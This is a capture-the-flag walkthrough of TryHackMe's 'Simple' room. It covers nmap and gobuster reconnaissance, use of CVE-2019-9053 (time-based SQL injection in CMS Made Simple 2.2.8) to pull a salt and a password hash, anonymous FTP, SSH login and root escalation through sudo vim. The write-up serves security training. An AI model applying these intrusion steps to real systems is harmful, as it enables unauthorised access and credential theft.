This is a walkthrough of the "Simple" room on Try Hack Me. I won't be including the actual answers to the questions posed, but the details will all be in here somewhere if you need help.
1 & 2
How many services are running under port 1000?
What is running on the higher port?
Let's run nmap:
kali@kali:~$ sudo nmap -v -sV 10.10.148.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-18 00:14 UTC
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 00:14
Scanning 10.10.148.149 [4 ports]
Completed Ping Scan at 00:14, 0.34s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:14
Completed Parallel DNS resolution of 1 host. at 00:14, 0.02s elapsed
Initiating SYN Stealth Scan at 00:14
Scanning 10.10.148.149 [1000 ports]
Discovered open port 21/tcp on 10.10.148.149
Discovered open port 80/tcp on 10.10.148.149
Discovered open port 2222/tcp on 10.10.148.149
Completed SYN Stealth Scan at 00:14, 21.83s elapsed (1000 total ports)
Initiating Service scan at 00:14
Scanning 3 services on 10.10.148.149
Completed Service scan at 00:14, 6.85s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.148.149.
Initiating NSE at 00:14
Completed NSE at 00:14, 1.20s elapsed
Initiating NSE at 00:14
Completed NSE at 00:14, 2.28s elapsed
Nmap scan report for 10.10.148.149
Host is up (0.24s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.96 seconds
Raw packets sent: 2011 (88.460KB) | Rcvd: 14 (600B)
3 & 4
What's the CVE you're using against the application?
To what kind of vulnerability is the application vulnerable?
Well we don't even know the "application" yet. Let's see what we can find on http for this target. Let's run gobuster to see what there is other than the default apache page.
kali@kali:~$ gobuster dir --url 10.10.148.149 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.148.149
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/09/17 23:35:33 Starting gobuster
===============================================================
/simple (Status: 301)
After poking around a little bit at what appears to be a CMS, one thing that stands out is a "news module" that looks to be installed. The page also let's us know the version of the software is 2.2.8.
Googling for "cms made simple news cve 2.2.8" let's us know it has a vulnerability to a "blind time-based SQL injection via the m1_idlist parameter" known as CVE-2019-9053
Find a suitable exploit script for the CVE that uses a time based SQLi to extract the salt, username, and password fields. I ended up needing to adjust the script a bit to account for variations in timing and then to deal with some Unicode encoding issues in my wordlists or something. I'm still learning Python. It gets the necessary information easily enough after that. I also adjusted the script to let me not start from scratch but instead input the salt and password I had found. That way when the script errored out on Unicode stuff, I could more quickly adjust it and retry.
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: m
[+] Username found: mi
[+] Username found: mit
[+] Username found: mitc
[+] Username found: mitch
[+] Email found: admin@admin.comn
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
5
What's the password?
[+] Password cracked: ******
6
Where can you login with the details obtained?
SSH is available on port 2222, so that seems like the most likely answer.
7
What's the user flag?
$ ls -l
total 4
-rw-rw-r-- 1 mitch mitch 19 aug 17 2019 user.txt
$ cat user.txt
**** ***, **** **!
Check on the open ftp port
kali@kali:~$ ftp 10.10.29.213
Connected to 10.10.29.213.
220 (vsFTPd 3.0.3)
Name (10.10.29.213:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -l
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -l
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 166 Aug 17 2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
local: ForMitch.txt remote: ForMitch.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
226 Transfer complete.
166 bytes received in 0.00 secs (93.9220 kB/s)
ftp> 221 Goodbye.
kali@kali:~$ cat ForMitch.txt
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
I didn't really need this helpful tip at this point, but it might have pointed out what needs to be done if I had checked it earlier.
8
Is there any other user in the home directory? What's its name?
Easy enough to go up and list directories under /home
9
What can you leverage to spawn a privileged shell?
Scan for privilege escalation with linpeas
It finds that this user can run vim as root. You can find this out with sudo -l as well. From there it's the last step, just go to command mode in vim and open a shell, we'll be root.
10
What's the root flag?
$ sudo vim
root@Machine:~# cd /root
root@Machine:/root# cat root.txt
**** ****. *** **** **!